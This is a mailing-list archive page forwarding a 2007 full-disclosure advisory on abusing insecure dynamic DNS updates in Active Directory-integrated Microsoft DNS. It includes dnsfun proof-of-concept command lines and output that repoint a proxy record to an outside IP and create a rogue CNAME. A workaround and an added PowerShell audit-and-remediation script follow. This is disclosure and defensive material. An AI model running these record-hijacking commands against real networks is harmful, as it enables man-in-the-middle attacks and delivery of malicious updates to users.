Security-Alerts mailing list archive (security-alerts@yandex-team.ru)


[security-alerts] FW: Exploiting Microsoft dynamic Dns updates




> -----Original Message-----
> From: full-disclosure-bounces@xxxxxxxxxxxxxxxxx [mailto:full-disclosure-bounces@xxxxxxxxxxxxxxxxx] On Behalf Of Andres Tarasco
> Sent: Thursday, March 22, 2007 1:35 PM
> To: full-disclosure@xxxxxxxxxxxxxxxxx; bugtraq@xxxxxxxxxxxxxxxxx
> Subject: [Full-disclosure] Exploiting Microsoft dynamic Dns updates
> 
> Hi list,
> 
> By default, most Microsoft DNS servers integrated with Active Directory allow
> insecure dynamic updates for DNS records.
> This feature allows remote users to create, change and delete DNS records.
> There are several attack scenarios:
> 
> + MITM attacks: Changing DNS records for the network proxy and relaying HTTP queries.
>   This attack vector is the most reliable and also allows us to exploit automatic
>   updates for most Windows software, by deploying custom binaries to the client.
>
> + Denial of service: by deleting / changing critical DNS records
>
> + Pharming: like MITM attacks, poisoning several DNS records.
> 
> dnsfun exploits that weak configuration and allows remote users to modify DNS records.
> Here are some examples of what can be done. Example:
> 
> 
> D:\DNSfun>ping -n 1 FakeProxy.fooooo.com
> Haciendo ping a FakeProxy.fooooo.com [66.6.66.6] con 32 bytes de datos:
>       
> D:\DNSfun>dnsfun.exe -s 10.100.1.1 -q  proxy.mydomain -u 66.6.66.6
> Microsoft Dynamic DNS Updates - Proof of Concept 
> http://www.514.es - (c) 2007 Andres Tarasco Acuña
>       
>  [+] Trying to resolve Host: proxy.mydomain (Dns Server 10.100.1.1)
>  [+] Host proxy.mydomain resolved as 192.168.1.200
>  [+] Trying to set ip address of the host proxy.mydomain to 66.6.66.6
>  [+] Trying Nonsecure Dynamic Update...
>  [?] Host Updated. Checking...(0) 
>  [+] Host proxy.mydomain resolved as 66.6.66.6
> 
> D:\DNSfun>dnsfun.exe -s 10.100.1.1 -cc atarasco.mydomain.com -u www.514.es
>  Microsoft Dynamic DNS Updates - Proof of Concept
>  http://www.514.es - (c) 2007 Andres Tarasco Acuña
> 
> [+] Gathering Credentials.. 
> [+] Creating DNS CName Record for atarasco.mydomain.com (www.514.es)
> [+] Host Created. Rechecking Record...
> [+] Host atarasco.mydomain.com resolved as CNAME www.514.es
> 
> This isn't a new vulnerability but AFAIK those attack vectors were never exploited.
> Workaround: Disable dynamic updates or set your DNS to only accept secure updates.
> 
> Spanish version and both src+binary are available at 
> http://www.514.es/2007/03/explotando_actualizaciones_din.html
> 
> regards,
> 
> Andres Tarasco
> 
> 
> 
> 

Attachment: dnsfun.c
Description: dnsfun.c
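
The workaround named in the message above (disable dynamic updates or accept only secure updates), as an added audit script that is not part of the original post or of dnsfun. It assumes the DnsServer PowerShell module (Windows Server 2012 or later); the parameter names $DnsServer and $Remediate are illustrative.

```powershell
#Requires -Modules DnsServer
# Added example: report zones that accept nonsecure dynamic updates and,
# on request, tighten them. Not code from the original post.
param(
    [string]$DnsServer = 'localhost',  # assumption: the DNS server to audit
    [switch]$Remediate                 # without this switch the script only reports
)

# Only primary zones take dynamic updates; skip the auto-created zones
# (0.in-addr.arpa, 127.in-addr.arpa, 255.in-addr.arpa).
$zones = Get-DnsServerZone -ComputerName $DnsServer |
    Where-Object { $_.ZoneType -eq 'Primary' -and -not $_.IsAutoCreated }

$report = foreach ($zone in $zones) {
    # "Secure" is only valid for AD-integrated zones. A file-backed zone
    # can only choose between None and NonsecureAndSecure, so the safe
    # target there is None (records must then be maintained by hand).
    $target = if ($zone.IsDsIntegrated) { 'Secure' } else { 'None' }

    [pscustomobject]@{
        Zone          = $zone.ZoneName
        AdIntegrated  = $zone.IsDsIntegrated
        DynamicUpdate = $zone.DynamicUpdate
        AtRisk        = ($zone.DynamicUpdate -eq 'NonsecureAndSecure')
        Target        = $target
    }
}

$report | Sort-Object AtRisk -Descending | Format-Table -AutoSize

if ($Remediate) {
    foreach ($row in $report | Where-Object AtRisk) {
        # -Confirm prompts once per zone before the setting is changed.
        Set-DnsServerPrimaryZone -ComputerName $DnsServer -Name $row.Zone `
            -DynamicUpdate $row.Target -Confirm
    }
}
```

Run it without -Remediate first and check which hosts (DHCP servers, clients that self-register) depend on updates to each flagged zone before changing the setting.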



 




Copyright © Lexa Software, 1996-2009.